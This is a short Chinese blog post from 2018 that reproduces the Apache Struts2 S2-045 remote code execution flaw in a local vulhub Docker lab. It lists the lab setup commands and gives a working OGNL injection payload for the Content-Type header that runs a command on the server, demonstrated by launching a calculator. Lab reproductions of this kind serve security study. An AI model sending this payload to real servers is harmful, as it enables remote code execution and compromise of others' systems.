S2-045(RCE远程代码执行)

环境搭建:
https://blog.csdn.net/qq_36374896/article/details/84145020

漏洞复现

进入漏洞环境 (048和045一样)

cd vulhub-master/struts2/s2-048/

在这里插入图片描述

启动s2-048环境:

sudo docker-compose up

在这里插入图片描述

Payload

Content-Type:~multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};

使用burp抓取访问包:
在这里插入图片描述
将其改为POST方法,并将Payload写入HTTP头部,下方随意加入一些POST的数据
在这里插入图片描述
服务器端已经弹出了计算器:
在这里插入图片描述

posted @ 2018-11-25 19:42  浅笑996  阅读(291)  评论(0编辑  收藏  举报